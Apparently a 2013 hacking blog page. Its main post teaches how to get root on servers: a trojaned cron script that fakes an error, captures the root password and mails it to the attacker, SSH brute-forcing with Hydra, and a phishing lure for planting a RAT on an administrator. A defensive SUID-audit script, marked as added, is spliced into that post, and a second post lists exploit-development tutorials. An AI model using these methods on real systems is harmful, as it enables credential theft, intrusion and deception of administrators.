Saturday, July 6, 2013

Rooting a Server without any Public Local Root Kernel Exploits!

Hello to Everyone!

As I mentioned in a Comment on an earlier Post, and because a Visitor of this Blog requested it, I will share with you some Methods on How to Root a Server when there isn’t any Local Root Kernel Exploit available!

1 – Looking for Custom Cron Tab Scripts
Cron Jobs are Tasks that are scheduled to be Executed at a specific time. If the Root user has created a Custom Script used by Cron, and we can Write on this File, we can send a “Fake” Error Message and the Root user will probably type in his password.

First, check out if there are any Cron Job Tasks:

crontab -l

If you see any Custom Script, we must Check out if we can Write on it.

Let’s say we got a Custom script here: /bin/cronscript

To check if we can Write a File, type:

stat /bin/cronscript

(If you get something like: “-rwxrwxrwx” in the output, you can edit the File!)

Let’s edit the file and send a Fake Error Message.

Make a Copy of the Original Script to /bin/cronscript.bak:

cp /bin/cronscript /bin/cronscript.bak

Edit the /bin/cronscript like this:


echo “An System Error Occured!”

echo “”

echo “Error Code: #131425″

echo “”

echo “Update to get the Latest Patch for this Security Issue.”

read -s -p “[sudo] password for root ” rootpasswd

echo “”

echo “su: Authentication failure”

echo “”

sudo apt-get update && sudo apt-get upgrade

sudo echo “The Password is: $rootpasswd” > .kod

mail -s “Root’s Password” “email@address.com” < .kod

rm .kod

mv cronscript.bak cronscript

You should just Replace the Underlined with your E-Mail and the Name of the Script!

After you save the File, type: chmod +x cronscript   to set it as Executable!

This script will:

- Send a Fake Error Message

- Request for the Root’s Password

- Send to your E-Mail Address the Password (make sure that there is the “mail” command at the /bin)

- Restore the Original File

When the Script gets Executed, the Root User will Enter his Password and it will be sent to you!

It would be better if you had some knowledge on Bash Programming…

2 – Enumerating all SUID Files
A SUID File is an Executable that runs with the Privileges of its Owner instead of those of the User who starts it; the find command below lists the ones owned by Root.
What does this mean for you:  You can Escalate Privileges in this way, if it is in an Important Directory.
As before, you can Social-Engineer a Privileged User.

To find all SUID Files, type:

find / -user root -perm -4000 -print

This will show all the SUID Files to your Terminal. Take your time and check them as they can help you to escalate Privileges!
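The same enumeration is the basis of a routine hardening check: compare the set-uid files on a host with an approved list and flag any that can be overwritten. The script below is an added example, not part of the original post; the function names and the baseline file format (one approved absolute path per line) are assumptions, and the sample tree is constructed.

```shell
#!/bin/sh
# Added defensive example: review set-uid files against an approved baseline.

# suid_list ROOT: every set-uid regular file under ROOT, sorted, one per line.
# -xdev stays on one filesystem; unlike the command above it does not filter
# on -user root, so set-uid files owned by other accounts are listed too.
suid_list() {
    find "$1" -xdev -type f -perm -4000 -print 2>/dev/null | sort
}

# suid_unexpected ROOT BASELINE: set-uid files not listed in BASELINE
# (a text file of approved absolute paths, one per line).
suid_unexpected() {
    suid_list "$1" | while read -r f; do
        grep -Fxq -- "$f" "$2" || echo "$f"
    done
}

# suid_writable ROOT: set-uid files that group or other may overwrite.
suid_writable() {
    find "$1" -xdev -type f -perm -4000 \( -perm -020 -o -perm -002 \) \
        -print 2>/dev/null | sort
}

# Constructed sample tree: one approved set-uid file, one stray, one ordinary.
demo=$(mktemp -d)
mkdir "$demo/bin"
for name in passwd helper report; do : > "$demo/bin/$name"; done
chmod 4755 "$demo/bin/passwd"   # approved in the baseline
chmod 4777 "$demo/bin/helper"   # not approved, and world-writable
chmod 0755 "$demo/bin/report"   # not set-uid, never listed
echo "$demo/bin/passwd" > "$demo/baseline.txt"
echo "unexpected:"; suid_unexpected "$demo" "$demo/baseline.txt"
echo "writable:";   suid_writable "$demo"
rm -rf "$demo"
```

Run `suid_unexpected / /path/to/baseline` from a scheduled job and alert on any output; remove the bit with `chmod u-s` where it is not needed.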

3 – Private Local Root Exploits
You can find Private Local (or Remote but it is far less common) Root Exploits by searching Google!

I have found Three (!) Private Local Root Exploits on some Kernel Versions I needed.

So, Search search search!  

4 – Bruteforcing Passwords
You can also try to Bruteforce the Password of the Root user or other Privileged Users!

Use the script named “rootdabitch“!

It runs on the Background and sends you the Password if it is Found!

Here is the Website of the Script….

You can also try to Bruteforce it via SSH! If you scan it with NMap and Find an SSH Port Open (Usually 22), you can Use Hydra to Crack the Password and gain Root Access via SSH!

Here is a Video on how to Bruteforce Passwords with Hydra over SSH:

5 – Social-Engineering the Administrator
This method doesn’t Depend on any Hacking Skills but on your Social-Engineering skills and Research Methods!

You can find so many great Books on Social-Engineering on Google. Search!

Follow these Steps:
1. Search on Google, Facebook, Twitter for Friends of the Administrator

2. Find Personal Information about the Admin (Names, Family, Work Location etc…)

3. Find E-Mails, Telephone/Mobile Numbers

4. Create a JavaDriveBy or a RAT

5. Send a Fake-Mail using a Fake-Mailer as a Friend of the Server’s Administrator including an Infected File (with your RAT)

6. The Admin should open the File and you get Root Privileges!

Example Message:

Hello Bob!

How are you? I just found out something awesome you will surely like!

It is a surprize! It is attached on a PDF File!

Check it out!
See ya!

Bob is the Victim (the Server’s Administrator). Thus, you have to Pretend to be his Friend. You need to research and Find a Close Friend and His E-Mail address so that it doesn’t seem as an Attack!

Summing that Up,  These are the Steps you should follow:

- Search for a Public Local Root Kernel Exploit. Here is my own Database: p0sth4x0r.net46.net/

- If you don’t find the Appropriate Exploit, try searching Google for Private Local/Remote Root Kernel Exploits.

- If you don’t find something again, try finding all SUID Files and Writeable Cron Tab Scripts that you can Exploit.

- If you aren’t satisfied with the Result, try to Brute-Force User or Root Passwords with Hydra or rootdabitch.

As you can see, you need to have Imagination, good Research Techniques, Programming Knowledge is Preferred, Unix Knowledge and Social-Engineering! Learn even the most basics of all these, and you will know how to Root Servers in Minutes!

Source: gnahackteam

Wednesday, July 3, 2013

Exploit development

In this post I share some useful links for people who are just starting to study or work on exploit development.

mona.py – the manual <- Highly recommended tool

First: Exploit Writing Tutorials by corelanc0d3r.
  1. Exploit writing tutorial part 1 : Stack Based Overflows
  2. Exploit writing tutorial part 2 : Stack Based Overflows – jumping to shellcode
  3. Exploit writing tutorial part 3 : SEH Based Exploits
  4. Exploit writing tutorial part 3b : SEH Based Exploits – just another example
  5. Exploit writing tutorial part 4 : From Exploit to Metasploit – The basics
  6. Exploit writing tutorial part 5 : How debugger modules & plugins can speed up basic exploit development
  7. Exploit writing tutorial part 6 : Bypassing Stack Cookies, SafeSeh, SEHOP, HW DEP and ASLR
  8. Exploit writing tutorial part 7 : Unicode – from 0x00410041 to calc
  9. Exploit writing tutorial part 8 : Win32 Egg Hunting
  10. Exploit writing tutorial part 9 : Introduction to Win32 shellcoding
  11. Exploit writing tutorial part 10 : Chaining DEP with ROP – the Rubik’s[TM] Cube
  12. Starting to write Immunity Debugger PyCommands : my cheatsheet

Second: SecurityTube Exploit Research megaprimer.

  1. Exploit Research Megaprimer Part 1 Topic Introduction By Vivek
  2. Exploit Research Megaprimer Part 2 Memcpy Buffer Overflow
  3. Exploit Research Megaprimer Part 3 Strcpy Buffer Overflow
  4. Exploit Research Megaprimer Part 4 Minishare Buffer Overflow
  5. Exploit Research Megaprimer Part 5 Freesshd Buffer Overflow
  6. Exploit Research Megaprimer Part 6 Seh Basics
  7. Exploit Research Megaprimer Part 7 Overwrite Seh
  8. Exploit Research Megaprimer Part 8 Exploiting Seh
  9. Exploit Research Megaprimer Part 9 Guest Lecture By Andrew King
  10. Binary Diffing Microsoft Patches

Third: Heap Overflow: For Humans + Vulnerability and Heap Internals Explained

Fourth: ARM exploitation

Fifth: Many interesting videos related with exploit development

Soon this post will be updated.